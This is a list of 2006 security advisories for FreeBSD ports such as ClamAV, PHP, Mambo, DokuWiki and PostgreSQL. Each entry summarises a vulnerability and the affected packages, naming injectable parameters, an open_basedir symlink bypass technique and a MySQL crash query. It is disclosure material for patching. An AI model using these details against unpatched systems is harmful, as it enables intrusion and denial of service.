| 2006-10-16 | Secunia reports: Two vulnerabilities have been reported in Clam AntiVirus, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. 1) An unspecified error in the CHM unpacker in chmunpack.c can be exploited to cause a DoS. 2) An unspecified error in rebuildpe.c when rebuilding PE files after unpacking can be exploited to cause a heap-based buffer overflow. more... | clamav clamav-devel |
| 2006-10-16* | Stefan Esser reports: PHP's open_basedir feature is meant to disallow scripts to access files outside a set of configured base directories. The checks for this are placed within PHP functions dealing with files before the actual open call is performed. Obviously there is a little span of time between the check and the actual open call. During this time span the checked path could have been altered and point to a file that is forbidden to be accessed due to open_basedir restrictions. Because the open_basedir restrictions often not call PHP functions but 3rd party library functions to actually open the file it is impossible to close this time span in a general way. It would only be possible to close it when PHP handles the actual opening on it's own. While it seems hard to change the path during this little time span it is very simple with the use of the symlink() function combined with a little trick. PHP's symlink() function ensures that source and target of the symlink operation are allowed by open_basedir restrictions (and safe_mode). However it is possible to point a symlink to any file by the use of mkdir(), unlink() and at least two symlinks. more... | mod_php4 mod_php5 php-suhosin php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-10-15 | Javier Fernández-Sanguino Peña reports a vulnerability in tkdiff which allows local users to gain priveleges of the user running tkdiff due to insecure temporary file creation. more... | tkdiff |
| 2006-10-15 | Dedi Dwianto a.k.a the_day reports: Input passed to the "$calpath" parameter in update.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. more... | vtiger |
| 2006-10-15* | Steven Roddis reports that User-Agent string is not properly escaped when handled by torrentflux. This allows for arbitrary code insertion. more... | torrentflux |
| 2006-10-15* | Secunia reports: Arai has reported a vulnerability in Movable Type and Movable Type Enterprise, which can be exploited by malicious people to conduct cross-site scripting attacks. Some unspecified input passed via the search functionality isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | MT |
| 2006-10-15* | Secunia reports: A vulnerability has been reported in Plans, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "evt_id" parameter in "plans.cgi" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that SQL database support has been enabled in "plans_config.pl" (the default setting is flat files). Some vulnerabilities have been reported in Plans, which can be exploited by malicious people to conduct cross-site scripting attacks or gain knowledge of sensitive information. Input passed to various unspecified parameters is not properly sanitised before being returned to users. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site. An unspecified error can be exploited to gain knowledge of the MySQL password. more... | plans |
| 2006-10-15* | eyeOS team reports: [EyeOS 0.9.1] release fixes two XSS security bugs, so we recommend all users to upgrade to this new version in order to have the best security. These two bugs were discovered by Jose Carlos Norte, who is a new eyeOS developer. more... | eyeOS |
| 2006-10-12 | Secunia reports: Clam AntiVirus have a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a stack overflow when scanning messages with deeply nested multipart content. This can be exploited to crash the service by sending specially crafted emails to a vulnerable system. more... | clamav clamav-devel |
| 2006-10-11* | Secunia reports: Will Drewry has reported some vulnerabilities in Cscope, which potentially can be exploited by malicious people to compromise a vulnerable system. Various boundary errors within the parsing of file lists or the expansion of environment variables can be exploited to cause stack-based buffer overflows when parsing specially crafted "cscope.lists" files or directories. A boundary error within the parsing of command line arguments can be exploited to cause a stack-based buffer overflow when supplying an overly long "reffile" argument. Successful exploitation may allow execution of arbitrary code. more... | cscope |
| 2006-10-09* | Gentoo reports: Andrea Barisani of Gentoo Linux discovered xzgv and zgv allocate insufficient memory when rendering images with more than 3 output components, such as images using the YCCK or CMYK colour space. When xzgv or zgv attempt to render the image, data from the image overruns a heap allocated buffer. An attacker may be able to construct a malicious image that executes arbitrary code with the permissions of the xzgv or zgv user when attempting to render the image. more... | xzgv zgv |
| 2006-10-08* | Benjamin C. Wiley Sittler reports: I discovered a [buffer overrun in repr() for unicode strings]. This causes an unpatched non-debug wide (UTF-32/UCS-4) build of python to abort. Ubuntu security team reports: If an application uses repr() on arbitrary untrusted data, this [bug] could be exploited to execute arbitrary code with the privileges of the python application. more... | python python+ipv6 |
| 2006-10-08* | According to Python Security Advisory PSF-2005-001, The Python development team has discovered a flaw in the SimpleXMLRPCServer library module which can give remote attackers access to internals of the registered object or its module or possibly other modules. The flaw only affects Python XML-RPC servers that use the register_instance() method to register an object without a _dispatch() method. Servers using only register_function() are not affected. On vulnerable XML-RPC servers, a remote attacker may be able to view or modify globals of the module(s) containing the registered instance's class(es), potentially leading to data loss or arbitrary code execution. If the registered object is a module, the danger is particularly serious. For example, if the registered module imports the os module, an attacker could invoke the os.system() function. Note: This vulnerability affects your system only if you're running SimpleXMLRPCServer-based server. This isn't harmful at all if you don't run any internet server written in Python or your server doesn't serve in XML-RPC protocol. more... | python python+ipv6 |
| 2006-10-05 | James Bercegay reports: Mambo is vulnerable to an Authentication Bypass issue that is due to an SQL Injection in the login function. The SQL Injection is possible because the $passwd variable is only sanitized when it is not passed as an argument to the function. Omid reports: There are several sql injections in Mambo 4.6 RC2 & Joomla 1.0.10 (and maybe other versions): When a user edits a content, the "id" parameter is not checked properly in /components/com_content/content.php, which can cause 2 sql injections. The "limit" parameter in the administration section is not checked. This affects many pages of administration section In the administration section, while editing/creating a user, the "gid" parameter is not checked properly. more... | mambo |
| 2006-10-05 | Urs Janssen and Aleksey Salow report possible buffer overflows in tin versions 1.8.0 and 1.8.1. OpenPKG project elaborates there is an allocation off-by-one bug in version 1.8.0 which can lead to a buffer overflow. more... | tin zh-tin |
| 2006-10-05 | Howard Chu reports: An ACL of the form 'access to dn.subtree="ou=groups, dc=example,dc=com" attr=member by * selfwrite' is intended to only allow users to add/delete their own DN to the target attribute. Currently it allows any DNs to be modified. more... | openldap-sasl-server openldap-server |
| 2006-10-05 | Sebastian Krahmer reports: Sebastian Krahmer of the SuSE security team discovered that the System.CodeDom.Compiler classes used temporary files in an insecure way. This could allow a symbolic link attack to create or overwrite arbitrary files with the privileges of the user invoking the program. Under some circumstances, a local attacker could also exploit this to inject arbitrary code into running Mono processes. more... | mono |
| 2006-10-05* | The Team Mambo reports that two SQL injection vulnerabilities have been found in Mambo. The vulnerabilities exists due to missing sanitation of the title and catid parameters in the weblinks.php page and can lead to execution of arbitrary SQL code. more... | mambo |
| 2006-10-05* | A Project cURL Security Advisory reports: libcurl uses the given file part of a TFTP URL in a manner that allows a malicious user to overflow a heap-based memory buffer due to the lack of boundary check. This overflow happens if you pass in a URL with a TFTP protocol prefix ("tftp://"), using a valid host and a path part that is longer than 512 bytes. The affected flaw can be triggered by a redirect, if curl/libcurl is told to follow redirects and an HTTP server points the client to a tftp URL with the characteristics described above. more... | curl linux-curl |
| 2006-10-05* | Ulf Härnhammar reports: When Lynx connects to an NNTP server to fetch information about the available articles in a newsgroup, it will call a function called HTrjis() with the information from certain article headers. The function adds missing ESC characters to certain data, to support Asian character sets. However, it does not check if it writes outside of the char array buf, and that causes a remote stack-based buffer overflow. more... | ja-lynx lynx lynx-ssl |
| 2006-10-04* | Secunia reports: Mailman can be exploited by malicious people to conduct cross-site scripting and phishing attacks, and cause a DoS (Denial of Service). 1) An error in the logging functionality can be exploited to inject a spoofed log message into the error log via a specially crafted URL. Successful exploitation may trick an administrator into visiting a malicious web site. 2) An error in the processing of malformed headers which does not follow the RFC 2231 standard can be exploited to cause a DoS (Denial of Service). 3) Some unspecified input isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | ja-mailman mailman mailman-with-htdig |
| 2006-10-03* | phpMyAdmin team reports: We received a security advisory from Stefan Esser (sesser@hardened-php.net) and we wish to thank him for his work. It was possible to inject arbitrary SQL commands by forcing an authenticated user to follow a crafted link. more... | phpMyAdmin |
| 2006-10-02 | SecurityTracker reports: A vulnerability was reported in FreeType. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can create a specially crafted font file that, when loaded by the target user's system, will trigger an integer underflow or integer overflow and crash the application or execute arbitrary code on the target system. Chris Evans reported these vulnerabilities. Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system. more... | freetype2 |
| 2006-10-02 | Secunia reports: A vulnerability has been reported in GnuTLS, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error in the verification of certain signatures. If a RSA key with exponent 3 is used, it may be possible to forge PKCS #1 v1.5 signatures signed with that key. more... | gnutls gnutls-devel |
| 2006-10-02* | Secunia reports: rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "TARGET_FN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory traversal attacks in combination with DokuWiki's file upload feature to execute arbitrary PHP code. CVE Mitre reports: Direct static code injection vulnerability in doku.php in DokuWiki before 2006-03-09c allows remote attackers to execute arbitrary PHP code via the X-FORWARDED-FOR HTTP header, which is stored in config.php. Unrestricted file upload vulnerability in lib/exe/media.php in DokuWiki before 2006-03-09c allows remote attackers to upload executable files into the data/media folder via unspecified vectors. DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug". more... | dokuwiki dokuwiki-devel |
| 2006-10-02* | Secunia reports: Some vulnerabilities have been reported in DokuWiki, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Input passed to the "w" and "h" parameters in lib/exec/fetch.php is not properly sanitised before being passed as resize parameters to the "convert" application. This can be exploited to cause a DoS due to excessive CPU and memory consumption by passing very large numbers, or to inject arbitrary shell commands by passing specially crafted strings to the "w" and "h" parameter. Successful exploitation requires that the "$conf[imconvert]" option is set. more... | dokuwiki dokuwiki-devel |
| 2006-10-01* | The Debian Security Team reports: Michael Gehring discovered several potential out-of-bounds index accesses in gtetrinet, a multiplayer Tetris-like game, which may allow a remote server to execute arbitrary code more... | gtetrinet |
| 2006-09-30 | Problem Description The CRC compensation attack detector in the sshd(8) daemon, upon receipt of duplicate blocks, uses CPU time cubic in the number of duplicate blocks received. [CVE-2006-4924] A race condition exists in a signal handler used by the sshd(8) daemon to handle the LoginGraceTime option, which can potentially cause some cleanup routines to be executed multiple times. [CVE-2006-5051] Impact An attacker sending specially crafted packets to sshd(8) can cause a Denial of Service by using 100% of CPU time until a connection timeout occurs. Since this attack can be performed over multiple connections simultaneously, it is possible to cause up to MaxStartups (10 by default) sshd processes to use all the CPU time they can obtain. [CVE-2006-4924] The OpenSSH project believe that the race condition can lead to a Denial of Service or potentially remote code execution, but the FreeBSD Security Team has been unable to verify the exact impact. [CVE-2006-5051] Workaround The attack against the CRC compensation attack detector can be avoided by disabling SSH Protocol version 1 support in sshd_config(5). There is no workaround for the second issue. more... | openssh openssh-portable |
| 2006-09-30 | Secunia reports: Thomas Pollet has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to the "highlight" parameter in tiki-searchindex.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. rgod has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to the "jhot.php" script not correctly verifying uploaded files. This can e.g. be exploited to execute arbitrary PHP code by uploading a malicious PHP script to the "img/wiki" directory. more... | tikiwiki |
| 2006-09-30 | CVE Mitre reports: PunBB 1.2.12 does not properly handle an avatar directory pathname ending in %00, which allows remote authenticated administrative users to upload arbitrary files and execute code, as demonstrated by a query to admin_options.php with an avatars_dir parameter ending in %00. NOTE: this issue was originally disputed by the vendor, but the dispute was withdrawn on 20060926. more... | punbb |
| 2006-09-26 | Secunia reports: Luigi Auriemma has reported a vulnerability in Freeciv, which can be exploited by malicious people to cause a DoS (Denial of Service). An error in the "generic_handle_player_attribute_chunk()" function in common/packets.c can be exploited to crash the service via a specially crafted PACKET_PLAYER_ATTRIBUTE_CHUNK packet sent to the server. An error in the "handle_unit_orders()" function in server/unithand.c can be exploited to crash the service via a specially crafted packet. more... | freeciv freeciv-gtk freeciv-gtk2 freeciv-nox11 |
| 2006-09-26 | Secunia reports: Luigi Auriemma has reported a vulnerability in Freeciv, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the handling of the packet length in "common/packets.c". This can be exploited to crash the Freeciv server via a specially- crafted packet with the size set to "0xffff". more... | freeciv freeciv-gtk freeciv-gtk2 freeciv-nox11 |
| 2006-09-26* | Ulf Härnhammar reports: There are buffer overflows when extracting, testing or listing specially prepared ACE archives. There are directory traversal bugs when extracting ACE archives. There are also buffer overflows when dealing with long (>17000 characters) command line arguments. Secunia reports: The vulnerabilities have been confirmed in version 1.2b. One of the buffer overflow vulnerabilities have also been reported in version 2.04, 2.2 and 2.5. Other versions may also be affected. Successful exploitation may allow execution of arbitrary code. more... | linux-unace unace |
| 2006-09-22 | Mitre CVE reports: Stack-based buffer overflow in libmms, as used by (a) MiMMS 0.0.9 and (b) xine-lib 1.1.0 and earlier, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions. more... | libmms libxine |
| 2006-09-22 | Opera reports: A specially crafted digital certificate can bypass Opera's certificate signature verification. Forged certificates can contain any false information the forger chooses, and Opera will still present it as valid. Opera will not present any warning dialogs in this case, and the security status will be the highest possible (3). This defeats the protection against "man in the middle", the attacks that SSL was designed to prevent. There is a flaw in OpenSSL's RSA signature verification that affects digital certificates using 3 as the public exponent. Some of the certificate issuers that are on Opera's list of trusted signers have root certificates with 3 as the public exponent. The forged certificate can appear to be signed by one of these. more... | linux-opera opera opera-devel |
| 2006-09-14* | The PHP development team reports: Added missing safe_mode/open_basedir checks inside the error_log(), file_exists(), imap_open() and imap_reopen() functions. Fixed overflows inside str_repeat() and wordwrap() functions on 64bit systems. Fixed possible open_basedir/safe_mode bypass in cURL extension and with realpath cache. Fixed overflow in GD extension on invalid GIF images. Fixed a buffer overflow inside sscanf() function. Fixed an out of bounds read inside stripos() function. Fixed memory_limit restriction on 64 bit system. more... | mod_php4 mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-09-13 | The Drupal Project reports: It is possible for a malicious user to spoof a user's identity by bypassing the login redirection mechanism in the pubcookie module. The malicious user may gain the privileges of the user they are spoofing, including the administrative user. more... | drupal-pubcookie |
| 2006-09-12 | Adobe reports: Multiple input validation errors have been identified in Flash Player 8.0.24.0 and earlier versions that could lead to the potential execution of arbitrary code. These vulnerabilities could be accessed through content delivered from a remote location via the user?s web browser, email client, or other applications that include or reference the Flash Player. (CVE-2006-3311, CVE-2006-3587, CVE-2006-3588) These updates include changes to prevent circumvention of the "allowScriptAccess" option. (CVE-2006-4640) more... | linux-flashplugin |
| 2006-09-12* | Oliver Karow discovered cross-site scripting issues in the Apache Jakarta Tomcat manager. The developers refer to the issues as minor. more... | jakarta-tomcat |
| 2006-09-12* | Pluf has discovered a vulnerability in Sun Java JDK/SDK, which potentially can be exploited by malicious people to compromise a user's system. The jar tool does not check properly if the files to be extracted have the string "../" on its names, so it's possible for an attacker to create a malicious jar file in order to overwrite arbitrary files within the filesystem. more... | diablo-jdk diablo-jdk-freebsd6 jdk linux-blackdown-jdk linux-ibm-jdk linux-jdk linux-sun-jdk |
| 2006-09-03* | 3APA3A reports: If programmer fails to check socket number before using select() or fd_set macros, it's possible to overwrite memory behind fd_set structure. Very few select() based application actually check FD_SETSIZE value. [...] Depending on vulnerable application it's possible to overwrite portions of memory. Impact is close to off-by-one overflows, code execution doesn't seems exploitable. more... | 3proxy bld bnc citadel dante gatekeeper jabber rinetd |
| 2006-09-02 | Kefka reports multiple cross site scripting vulnerabilities within hlstats. The vulnerabilities are caused due to improper checking of variables, allowing an attacker to perform cross site scripting. more... | hlstats |
| 2006-08-30 | The Joomla development team reports multiple vulnerabilities within the joomla application. Joomla is vulnerable to the following vulnerabilities: Improper validation of the mosMail function Improper validation of the JosIsValidEmail function. Remote code execution in PEAR.php Zend Hash del key or index vulnerability more... | joomla |
| 2006-08-17 | Secunia reports: Some vulnerabilities have been reported in Horde, which can be exploited by malicious people to conduct phishing and cross-site scripting attacks. Input passed to the "url" parameter in index.php isn't properly verified before it is being used to include an arbitrary web site in a frameset. This can e.g. be exploited to trick a user into believing certain malicious content is served from a trusted web site. Some unspecified input passed in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | horde imp |
| 2006-08-15 | The Globus Alliance reports: The proxy generation tool (grid-proxy-init) creates the file, secures the file to provide access only to owner and writes proxy to the file. A race condition exists between the opening of the proxy credentials file, and making sure it is safe file to write to. The checks to ensure this file is accessible only to the owner take place using the filename after the file is opened for writing, but before any data is written. Various components of the toolkit use files in shared directories to store information, some being sensitive information. For example, the tool to create proxy certificates, stores the generated proxy certificate by default in /tmp. Specific vulnerabilities in handling such files were reported in myproxy-admin-adduser, grid-ca-sign and grid-security-config. more... | globus |
| 2006-08-15* | Javier Fernández-Sanguino Peña reports two temporary file vulnerability within f2c. The vulnerabilities are caused due to weak temporary file handling. An attacker could create an symbolic link, causing a local user running f2c to overwrite the symlinked file. This could give the attacker elevated privileges. more... | f2c |
| 2006-08-13 | Ludwig Nussel reports that x11vnc is vulnerable to an authentication bypass vulnerability. The vulnerability is caused by an error in auth.c. This could allow a remote attacker to gain unauthorized and unauthenticated access to the system. more... | x11vnc |
| 2006-08-13 | Luigi Auriemma reports three vulnerabilities within alsaplayer: The function which handles the HTTP connections is vulnerable to a buffer-overflow that happens when it uses sscanf for copying the URL in the Location's field received from the server into the redirect buffer of only 1024 bytes declared in http_open. A buffer-overflow exists in the functions which add items to the playlist when the GTK interface is used (so the other interfaces are not affected by this problem): new_list_item and CbUpdated in interface/gtk/PlaylistWindow.cpp. AlsaPlayer automatically queries the CDDB server specified in its configuration (by default freedb.freedb.org) when the user choices the CDDA function for playing audio CDs. The function which queries the server uses a buffer of 20 bytes and one of 9 for storing the category and ID strings received from the server while the buffer which contains this server's response is 32768 bytes long. Naturally for exploiting this bug the attacker must have control of the freedb server specified in the AlsaPlayer's configuration. These vulnerabilities could allow a remote attacker to execute arbitrary code, possibly gaining access to the system. more... | alsaplayer |
| 2006-08-13 | The PostgreSQL development team reports: An attacker able to submit crafted strings to an application that will embed those strings in SQL commands can use invalidly-encoded multibyte characters to bypass standard string-escaping methods, resulting in possible injection of hostile SQL commands into the database. The attacks covered here work in any multibyte encoding. The widely-used practice of escaping ASCII single quote "'" by turning it into "\'" is unsafe when operating in multibyte encodings that allow 0x5c (ASCII code for backslash) as the trailing byte of a multibyte character; this includes at least SJIS, BIG5, GBK, GB18030, and UHC. An application that uses this conversion while embedding untrusted strings in SQL commands is vulnerable to SQL-injection attacks if it communicates with the server in one of these encodings. While the standard client libraries used with PostgreSQL have escaped "'" in the safe, SQL-standard way of "''" for some time, the older practice remains common. more... | ja-postgresql postgresql postgresql-server |
| 2006-08-13 | Multiple vulnerabilities had been reported in various versions of PostgreSQL: The EXECUTE restrictions can be bypassed by using the AGGREGATE function, which is missing a permissions check. A buffer overflow exists in gram.y which could allow an attacker to execute arbitrary code by sending a large number of arguments to a refcursor function, found in gram.y The intagg contributed module allows an attacker to crash the server (Denial of Service) by constructing a malicious crafted array. more... | ja-postgresql postgresql postgresql-server |
| 2006-08-13 | Jean-David Maillefer reports a Denial of Service vulnerability within MySQL. The vulnerability is caused by improper checking of the data_format routine, which cause the MySQL server to crash. The crash is triggered by the following code: "SELECT date_format('%d%s', 1); more... | mysql-server |
| 2006-08-13* | The PostgreSQL team reports: Due to inadequate validity checking, a user could exploit the special case that SET ROLE normally uses to restore the previous role setting after an error. This allowed ordinary users to acquire superuser status, for example. more... | postgresql-server |
| 2006-08-12 | The SquirrelMail developers report: A logged in user could overwrite random variables in compose.php, which might make it possible to read/write other users' preferences or attachments. more... | ja-squirrelmail squirrelmail |
| 2006-08-10 | The Ruby on Rails blog reports: With Rails 1.1.0 through 1.1.5 (minus the short-lived 1.1.3), you can trigger the evaluation of Ruby code through the URL because of a bug in the routing code of Rails. This means that you can essentially take down a Rails process by starting something like /script/profiler, as the code will run for a long time and that process will be hung while it happens. Other URLs can even cause data loss. more... | rubygem-rails |
| 2006-08-08 | Clamav team reports: A heap overflow vulnerability was discovered in libclamav which could cause a denial of service or allow the execution of arbitrary code. The problem is specifically located in the PE file rebuild function used by the UPX unpacker. Relevant code from libclamav/upx.c: memcpy(dst, newbuf, foffset); *dsize = foffset; free(newbuf); cli_dbgmsg("UPX: PE structure rebuilt from compressed file\n"); return 1; Due to improper validation it is possible to overflow the above memcpy() beyond the allocated memory block. more... | clamav clamav-devel |
| 2006-08-08* | The Drupal project reports: A malicious user can execute a cross site scripting attack by enticing someone to visit a Drupal site via a specially crafted link. more... | drupal |
| 2006-08-02 | Author reports: Fixed 2 more possible memory allocation attacks. They are similar to the problem we fixed with 1.4.4. This bug can easily be be exploted for a DoS; remote code execution is not entirely impossible. more... | gnupg |
| 2006-07-30* | Secunia reports: Two vulnerabilities have been reported in Ruby, which can be exploited by malicious people to bypass certain security restrictions. An error in the handling of the "alias" functionality can be exploited to bypass the safe level protection and replace methods called in the trusted level. An error caused due to directory operations not being properly checked can be exploited to bypass the safe level protection and close untainted directory streams. more... | ruby ruby_static |
| 2006-07-14 | Zope team reports: Unspecified vulnerability in (Zope2) allows local users to obtain sensitive information via unknown attack vectors related to the docutils module and "restructured text". more... | zope |
| 2006-07-14* | The Drupal team reports: Vulnerability: XSS Vulnerability in taxonomy module It is possible for a malicious user to insert and execute XSS into terms, due to lack of validation on output of the page title. The fix wraps the display of terms in check_plain(). more... | drupal |
| 2006-07-11 | Goober's advisory reports reports that shoutcast is vulnerable to an arbitrary file reading vulnerability: Impact of the vulnerability depends on the way the product was installed. In general, the vulnerability allows the attacker to read any file which can be read by the Shoutcast server process. more... | linux-shoutcast shoutcast |
| 2006-07-10 | The Samba Team reports: The smbd daemon maintains internal data structures used track active connections to file and printer shares. In certain circumstances an attacker may be able to continually increase the memory usage of an smbd process by issuing a large number of share connection requests. This defect affects all Samba configurations. more... | ja-samba samba |
| 2006-07-10 | A TWiki Security Alert reports: The TWiki upload filter already prevents executable scripts such as .php, .php1, .phps, .pl from potentially getting executed by appending a .txt suffix to the uploaded filename. However, PHP and some other types allows additional file suffixes, such as .php.en, .php.1, and .php.2. TWiki does not check for these suffixes, e.g. it is possible to upload php scripts with such suffixes without the .txt filename padding. This issue can also be worked around with a restrictive web server configuration. See the TWiki Security Alert for more information about how to do this. more... | twiki |
| 2006-07-05 | Horde 3.1.2 release announcement: Security Fixes: Closed XSS problems in dereferrer (IE only), help viewer and problem reporting screen. Removed unused image proxy code from dereferrer. more... | horde horde-php5 |
| 2006-07-02 | The webmin development team reports: An attacker without a login to Webmin can read the contents of any file on the server using a specially crafted URL. All users should upgrade to version 1.290 as soon as possible, or setup IP access control in Webmin. more... | usermin webmin |
| 2006-06-30 | SecurityFocus reports: Mutt is prone to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely crash the application, denying further service to legitimate users. more... | ja-mutt ja-mutt-devel |